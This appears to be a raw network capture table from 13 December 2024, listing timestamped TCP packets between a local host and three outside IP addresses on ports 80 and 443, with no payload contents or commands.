                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.432440996 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.433370113 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.433456898 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.434360027 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.434497118 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.435374975 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.435504913 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.436346054 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.436433077 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.437320948 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.437491894 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.438275099 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.438383102 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.439253092 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.439376116 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.440207958 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.440356970 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.441229105 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.441346884 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.442318916 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.442447901 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.443342924 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.443438053 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.444425106 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.444519997 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.445216894 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.445354939 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.446187973 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.446265936 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.447236061 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.447355986 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.448261023 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.448391914 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.449170113 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.449258089 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.450489998 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.450545073 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.451397896 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.451503038 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.452235937 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.452306032 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.453064919 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.453203917 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.453752995 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.453794003 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.453875065 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.453875065 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.453974009 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.454046011 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.454070091 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.454094887 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.454116106 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.454134941 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.454252005 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.454936981 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.455024004 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.455087900 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.455138922 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.455209970 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.456054926 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.456274033 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.456351042 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.457030058 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.457148075 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.457701921 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.458014011 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.458097935 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.458988905 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.459070921 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.459449053 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.459966898 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.460057974 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.460143089 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.460201979 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.460933924 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.461020947 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.461941957 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.462032080 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.462924957 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.463041067 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.463949919 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.464057922 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.464868069 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.464997053 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.465887070 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.466006041 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.466487885 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.466928005 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.467012882 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.467828035 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.476629972 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.476676941 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.476789951 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.609930992 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.609955072 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.610079050 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.610193014 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.610805035 CET44349860116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.610810995 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.610955000 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.610958099 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.610982895 CET49860443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.611011028 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.611116886 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.611928940 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.612026930 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.612925053 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.613044977 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.613913059 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.613976955 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.614924908 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.615035057 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.615880013 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.616049051 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.616923094 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.617079020 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.617845058 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.619273901 CET49860443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.619287014 CET44349860116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.621049881 CET49860443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.621056080 CET44349860116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.621139050 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.621279955 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.621517897 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.621552944 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.029835939 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.032866955 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.298403978 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.418282986 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.647448063 CET44349857116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.647553921 CET44349857116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.659341097 CET44349857116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.659514904 CET49857443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.663569927 CET49857443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.663590908 CET44349857116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.674273014 CET44349860116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.674339056 CET44349860116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.677908897 CET49860443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.681839943 CET49860443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.681859970 CET44349860116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.743309021 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.743390083 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.744448900 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.745686054 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.745804071 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.747977018 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.754412889 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.754493952 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.763041973 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.763170004 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.771606922 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.771713018 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.772221088 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.772221088 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.780282974 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.780400038 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.800084114 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.877434015 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.877646923 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.881334066 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.881762028 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.882751942 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.882762909 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.886229992 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.891318083 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.891387939 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.897948980 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.899795055 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.899883032 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.901407957 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.908365011 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.914079905 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.935311079 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.935389996 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.939618111 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.941185951 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.941196918 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.942207098 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.946265936 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.946396112 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.954911947 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.955070019 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.962094069 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.963563919 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.963610888 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.970169067 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.972264051 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.972367048 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.972588062 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.980812073 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.980890989 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.981514931 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.010512114 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.010592937 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.014142036 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.014952898 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.015064955 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.022388935 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.022464037 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.022464037 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.022830963 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.029860973 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.030073881 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.037266016 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.042757988 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.069457054 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.069590092 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.072696924 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.072804928 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.075258017 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.079020977 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.081321001 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.081335068 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.082151890 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.087670088 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.087753057 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.094033957 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.094047070 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.100425959 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.100544930 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.103199959 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.106777906 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.106791019 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.112503052 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.112620115 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.115367889 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.115367889 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.118410110 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.123347044 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.127470016 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.127573013 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.130306959 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.130417109 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.135857105 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.137969971 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.138053894 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.143374920 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.143646955 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.143671989 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.149202108 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.149358034 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.154772997 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.154863119 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.155536890 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.158387899 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.158519983 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.162026882 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.162115097 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.163629055 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.165653944 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.165735006 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.169294119 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.169560909 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.173054934 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.173079014 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.176579952 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.176646948 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.184838057 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.202702999 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.202795029 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.204343081 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.204346895 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.224030972 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.224144936 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.224885941 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.225708008 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.226347923 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.226394892 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.229876995 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.229891062 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.233144999 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.244560003 CET4984880192.168.2.4185.215.113.206
